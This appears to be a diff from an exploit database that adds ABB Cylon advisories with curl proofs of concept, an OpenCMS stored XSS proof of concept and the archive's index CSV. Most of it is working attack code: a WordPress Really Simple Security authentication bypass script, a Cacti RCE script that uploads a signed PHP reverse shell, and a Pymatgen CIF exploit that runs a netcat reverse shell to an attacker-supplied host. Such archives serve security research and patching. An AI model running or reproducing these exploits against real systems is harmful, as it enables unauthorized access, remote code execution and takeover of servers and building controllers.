░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/escDevicesUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2511531337&\
> escid1=192.168.1.1&\
> remove1=0&\
> escid2=192.168.1.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&\
> remove2=0&\
> etc.
> etc.
$ cat escDevicesUpdate.php
...
...
$ini = INI::read($comproperties);
unset($ini['comm']['esc-ip-addr']);
$rowCount = $_POST['rowCount'];
for ($i = 1; $i < $rowCount; $i++) {
$fieldEscid = "escid" . $i;
$fieldRemove = "remove" . $i;
if ($_POST[$fieldRemove] != 1) {
$escid = trim($_POST[$fieldEscid]);
$ini['comm']['esc-ip-addr'][$i] = $escid;
}
}
if (!INI::write($comproperties, $ini)) {
logWarning("ESC device listt modification FAILED");
$myLine = __LINE__;
errorCall($myLine);
}
...

100
exploits/php/hardware/52219.txt Normal file
View file

@ -0,0 +1,100 @@
ABB Cylon Aspect 3.08.02 (webServerUpdate.php) Input Validation Config Poisoning
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from improper input validation on
the port POST parameter in the webServerUpdate.php script. This input is not
validated on the server side and relies on bypassable client-side checks using
the inString.js script to verify that the port parameter contains only characters
from the set (0123456789). Attackers can bypass these checks and supply arbitrary
integer values. Exploitation of this issue can result in configuration poisoning,
Denial of Service (DoS) through malformed configurations, or manipulation of
server settings via Cross-Site Request Forgery (CSRF) combined with authentication
bypass.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5901
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5901.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/webServerUpdate.php \
> -d "port=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" \
> -H "Cookie: PHPSESSID=xxx"
<html>
<head>
<title>The ABB Group</title>
<link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" class="workspace" bgcolor="#CCCCCC" width="100%">
<tr>
<td width="100%" valign="top">
Web Server settings have been successfully updated.<br><br>Please go to <a href='//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/'>//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/</a> to continue. </td>
</tr>
</table>
<iframe src="webServerUpdateRun.php" style="visibility:hidden;">
</iframe>
</body>
</html>

124
exploits/php/webapps/52207.py Executable file
View file

@ -0,0 +1,124 @@
#!/usr/bin/env python3
# Exploit Title: Really Simple Security 9.1.1.1 - Authentication Bypass
# Date: 2024-11-19
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://really-simple-ssl.com/
# Software Link: https://really-simple-ssl.com/
# Version: Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1
# Tested on: 'WordPress 6.7.0' in Docker container (vulnerable application), 'Ubuntu 24.04.1 LTS' with 'Python 3.12.3' (script execution)
# CVE: CVE-2024-10924
# Category: WebApps
# Repository: https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit
# Vulnerability discovered and reported by: István Márton
# This is a Python3 program that exploits Really Simple Security < 9.1.2 authentication bypass vulnerability.
# This makes it possible for unauthenticated attackers to log in as any existing user on the site,
# such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
# https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass
# https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.
import argparse
import json
import logging
import random
import requests
import string
import validators
from requests.auth import HTTPBasicAuth
VERSION = "v1.0 (2024-11-19)"
DEFAULT_LOGGING_LEVEL = logging.INFO
def parse_arguments():
parser = argparse.ArgumentParser(
description=f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}"
)
parser.add_argument("-t", "--target",
required=True,
help="URL of the target WordPress")
parser.add_argument("-uid", "--user-id",
required=False,
default=1,
help="Victim user ID (1 is usually the admin).")
parser.add_argument("-v", "--verbose",
action="store_true",
required=False,
default=False,
help="verbose mode")
return parser.parse_args()
def validate_input(args):
try:
validators.url(args.target)
except validators.ValidationFailure:
raise ValueError("Invalid target URL!")
try:
if int(args.user_id) < 1:
raise ValueError("Invalid user ID!")
except ValueError:
raise ValueError("Invalid user ID!")
def send_request(url, user_id):
logging.info("Sending request to target WordPress.")
target_endpoint = f"{url}"
if not target_endpoint.endswith("/"):
target_endpoint = f"{target_endpoint}/"
target_endpoint = f"{target_endpoint}?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
}
body = {
"user_id": int(user_id),
"login_nonce": "".join(random.choices(string.digits, k=10)),
"redirect_to": "/wp-admin/"
}
logging.debug(f"Body: {body}")
try:
r = requests.post(target_endpoint, headers=headers, json=body , verify=False)
logging.info(f"Request sent to target WordPress (HTTP {r.status_code}).")
except Exception as e:
logging.fatal("Error in contacting the target WordPress.")
logging.fatal(e)
return
if r.status_code == 200 and r.headers["Set-Cookie"] is not None and "redirect_to" in r.text and "=deleted;" not in r.headers["Set-Cookie"]:
logging.info(f"Cookie received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------")
else:
logging.fatal("Wrong response received from the target WordPress.")
logging.debug(f"Cookie and body received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------\n{r.text}\n---------------------")
def main():
args = parse_arguments()
logging_level = DEFAULT_LOGGING_LEVEL
if args.verbose:
logging_level = logging.DEBUG
logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")
validate_input(args)
target = args.target.strip()
user_id = int(args.user_id)
logging.info(f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}")
logging.debug("Parameters:")
logging.debug(f" target = {target}")
logging.debug(f" user_id = {user_id}")
send_request(target, user_id)
logging.info("Finished.")
if __name__ == "__main__":
main()

42
exploits/php/webapps/52209.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: OpenCMS 17.0 - Stored Cross Site Scripting (XSS)
# Date: 24-11-2024
# Exploit Author: Siddhartha Naik
# Vendor Homepage: http://www.opencms.org/en/
# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=dade528f-ec17-11ee-ab97-7fde8b0295e1
# Affected Version: 17.0
# Category: WebApps
# Tested on: Windows 11
# CVE : CVE-2024-41447
1. Vendor Description:
OpenCms from Alkacon Software is a professional, easy to use website
content management system. OpenCms helps content managers worldwide to
create and maintain beautiful websites fast and efficiently.
2. Technical Description:
This is a Stored XSS vulnerability in the author field seen when publishing an article.
This vulnerability has been tested on latest versions of Brave and Firefox browsers.
It is believed to affect any user who clicks on the "Read More" button of the affected article and
can be exploited by any user who is able to modify/create articles.
3. Proof Of Concept:
a) Start by creating a new article. In the author field write your script like so:
<script>alert(1)</script>
b) Save and publish the article
c) The user who clicks on the read more button gets a popup saying '1'
4. Solution:
Upgrade to latest release.
http://www.opencms.org/en/home/news.html
5. Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41447
https://github.com/Sidd545-cr/CVE/blob/main/CVE-2024-41447%20-%20Stored%20XSS%20in%20author%20field.pdf
http://alkacon.com
http://opencms.com

311
exploits/php/webapps/52225.txt Normal file
View file

@ -0,0 +1,311 @@
# Exploit Title: Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated)
# Date: 06/01/2025
# Exploit Author: D3Ext
# Vendor Homepage: https://cacti.net/
# Software Link: https://github.com/Cacti/cacti/archive/refs/tags/release/1.2.26.zip
# Version: 1.2.26
# Tested on: Kali Linux 2024
# CVE: CVE-2024-25641
#!/usr/bin/python3
import os
import requests
import base64
import gzip
import time
import argparse
import string
import random
from bs4 import BeautifulSoup
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives import serialization
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
def check_version(url_to_check):
r = requests.get(url_to_check)
response = r.text
if "Cacti CHANGELOG" in response and "1.2.26" in response and "1.2.27" not in response:
print("[+] Version seems to be 1.2.26")
else:
print("[-] Version doesn't seem to be 1.2.26, proceeding anyway")
# Main function
if __name__ == '__main__':
p = argparse.ArgumentParser(description="CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE")
p.add_argument('--url', help="URL of the Cacti web root", required=True)
p.add_argument('--user', help="username to log in", required=True)
p.add_argument('--password', help="password of the username", required=True)
p.add_argument('--lhost', help="local host to receive the reverse shell", required=True)
p.add_argument('--lport', help="local port to receive the reverse shell", required=True)
p.add_argument('--verbose', help="enable verbose", action='store_true', default=False, required=False)
# Parse CLI arguments
parser = p.parse_args()
url = parser.url
username = parser.user
password = parser.password
lhost = parser.lhost
lport = parser.lport
verbose = parser.verbose
url = url.rstrip("/")
print("CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE\n")
# check if versions match
print("[*] Checking Cacti version...")
time.sleep(0.5)
check = check_version(url + "/CHANGELOG")
if check == False:
sys.exit(0)
req = requests.Session()
if verbose:
print("[*] Capturing CSRF token...")
r = req.get(url)
# extract CSRF token
soup = BeautifulSoup(r.text, 'html.parser')
html_parser = soup.find('input', {'name': '__csrf_magic'})
csrf_token = html_parser.get('value')
if verbose:
print("[+] CSRF token: " + csrf_token)
print("[*] Logging in on " + url + "/index.php")
# define login post data
login_data = {
'__csrf_magic': csrf_token,
'action': 'login',
'login_username': username,
'login_password': password,
'remember_me': 'on'
}
# send login request
r = req.post(url + "/index.php", data=login_data)
# check success
if 'Logged in' in r.text:
print("[+] Successfully logged in as " + username)
else:
print("[-] An error has ocurred while logging in as " + username)
sys.exit(0)
# generate random filename
random_name = get_random_string(10)
random_filename = random_name + ".php"
payload = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '""" + lhost + """';
$port = """ + lport + """;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>"""
# generate payload
print("[*] Generating malicious payload...")
keypair = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = keypair.public_key().public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo)
file_signature = keypair.sign(payload.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256())
b64_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
b64_file_signature = base64.b64encode(file_signature).decode('utf-8')
b64_public_key = base64.b64encode(public_key).decode('utf-8')
data = """<xml>
<files>
<file>
<name>resource/""" + random_filename + """</name>
<data>""" + b64_payload + """</data>
<filesignature>""" + b64_file_signature + """</filesignature>
</file>
</files>
<publickey>""" + b64_public_key + """</publickey>
<signature></signature>
</xml>"""
signature = keypair.sign(data.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256())
final_data = data.replace("<signature></signature>", "<signature>" + base64.b64encode(signature).decode('utf-8') + "</signature>").encode('utf-8')
# write gzip data
f = open(random_filename + ".gz", "wb")
f.write(gzip.compress(final_data))
f.close()
print("[+] Malicious GZIP: " + random_filename + ".gz")
# define post data
post_data = {
'__csrf_magic': csrf_token,
'trust_signer': 'on',
'save_component_import': 1,
'action': 'save'
}
# upload file
print("[*] Uploading GZIP file...")
# send post request
r = req.post(url + "/package_import.php?package_location=0&preview_only=on&remove_orphans=on&replace_svalues=on", data=post_data, files={'import_file': open(random_filename + ".gz", 'rb')})
print("[+] Successfully uploaded GZIP file")
time.sleep(0.5)
print("[*] Validating success...")
soup = BeautifulSoup(r.text, 'html.parser')
html_parser = soup.find('input', {'title': "/var/www/html/cacti/resource/" + random_filename})
file_id = html_parser.get('id')
post_data = {
'__csrf_magic': csrf_token,
'trust_signer': 'on',
'data_source_profile': 1,
'remove_orphans': 'on',
'replace_svalues': 'on',
file_id: 'on',
'save_component_import': 1,
'preview_only': '',
'action': 'save',
}
r = req.post(url + "/package_import.php?header=false", data=post_data)
print("[+] Success!")
time.sleep(0.5)
print("[*] Triggering reverse shell by sending GET request to " + url + "/resource/" + random_filename)
time.sleep(0.2)
print("[+] Check your netcat listener")
# remove payload file
os.remove(random_filename + ".gz")
r = req.get(url + "/resource/" + random_filename)

53
exploits/python/remote/52205.py Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https ://pymatgen.org
# Software Link : https ://pypi.org /project /pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346
import os
# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
# Constructing the malicious CIF file with reverse shell payload
malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date 2024-11-13
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
"""
# Save to a file
with open("vuln.cif", "w") as file:
file.write(malicious_cif)
print("[*] Malicious CIF file created: vuln.cif")
# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
ip = input("Enter your IP address for the reverse shell: ")
port = input("Enter the port for the reverse shell to listen on: ")
# Create the malicious CIF file
create_malicious_cif(ip, port)
# Trigger the Pymatgen CIF parser to parse the malicious file
from pymatgen.io.cif import CifParser
parser = CifParser("vuln.cif")
structure = parser.parse_structures()
# Running the exploit
if __name__ == "__main__":
exploit()

21
files_exploits.csv
View file

@ -5665,6 +5665,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39418,exploits/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,webapps,java,,2016-02-14,2016-02-14,1,,,,http://www.exploit-db.com/screenshots/idlt39500/captura-de-pantalla-de-2016-02-14-185026.png,http://www.exploit-db.comapache-solr-3.5.0.tgz, 39418,exploits/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,webapps,java,,2016-02-14,2016-02-14,1,,,,http://www.exploit-db.com/screenshots/idlt39500/captura-de-pantalla-de-2016-02-14-185026.png,http://www.exploit-db.comapache-solr-3.5.0.tgz,
49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",2021-01-06,1F98D,webapps,java,,2021-01-06,2021-01-08,1,CVE-2020-10199,,,,, 49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",2021-01-06,1F98D,webapps,java,,2021-01-06,2021-01-08,1,CVE-2020-10199,,,,,
33687,exploits/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",webapps,java,,2010-03-02,2014-06-09,1,,,,,,https://www.securityfocus.com/bid/38483/info 33687,exploits/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",webapps,java,,2010-03-02,2014-06-09,1,,,,,,https://www.securityfocus.com/bid/38483/info
52206,exploits/java/webapps/52206.py,"Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)",2025-04-15,d3sca,webapps,java,,2025-04-15,2025-04-15,0,CVE-2024-52302,,,,,https://github.com/d3sca/CVE-2024-52302
51577,exploits/java/webapps/51577.py,"Spring Cloud 3.2.2 - Remote Command Execution (RCE)",2023-07-11,GatoGamer1155,webapps,java,,2023-07-11,2023-07-11,0,CVE-2022-22963,,,,, 51577,exploits/java/webapps/51577.py,"Spring Cloud 3.2.2 - Remote Command Execution (RCE)",2023-07-11,GatoGamer1155,webapps,java,,2023-07-11,2023-07-11,0,CVE-2022-22963,,,,,
46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,"Metasploit Framework (MSF)",,,, 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,"Metasploit Framework (MSF)",,,,
46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,Traversal,,,, 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,Traversal,,,,
@ -10397,7 +10398,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,, 3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,,
42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,, 42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,,
32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info
52221,exploits/multiple/hardware/52221.txt,"ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-48845,,,,,
52217,exploits/multiple/hardware/52217.txt,"ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516;CVE-2024-51550;CVE-2024-48839,,,,,
52214,exploits/multiple/hardware/52214.txt,"ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516,,,,,
52215,exploits/multiple/hardware/52215.txt,"ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516,,,,,
52216,exploits/multiple/hardware/52216.txt,"ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-48839,,,,,
52224,exploits/multiple/hardware/52224.txt,"ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51546,,,,,
52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, 52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52220,exploits/multiple/hardware/52220.txt,"ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,,,,,,
52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, 52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52179,exploits/multiple/hardware/52179.txt,"ABB Cylon FLXeon 9.3.4 - Default Credentials",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, 52179,exploits/multiple/hardware/52179.txt,"ABB Cylon FLXeon 9.3.4 - Default Credentials",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52188,exploits/multiple/hardware/52188.txt,"ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48841,,,,, 52188,exploits/multiple/hardware/52188.txt,"ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48841,,,,,
@ -11060,6 +11068,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple,,2002-07-09,2012-09-29,1,CVE-2002-1042;OSVDB-846,,,,,https://www.securityfocus.com/bid/5191/info 21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple,,2002-07-09,2012-09-29,1,CVE-2002-1042;OSVDB-846,,,,,https://www.securityfocus.com/bid/5191/info
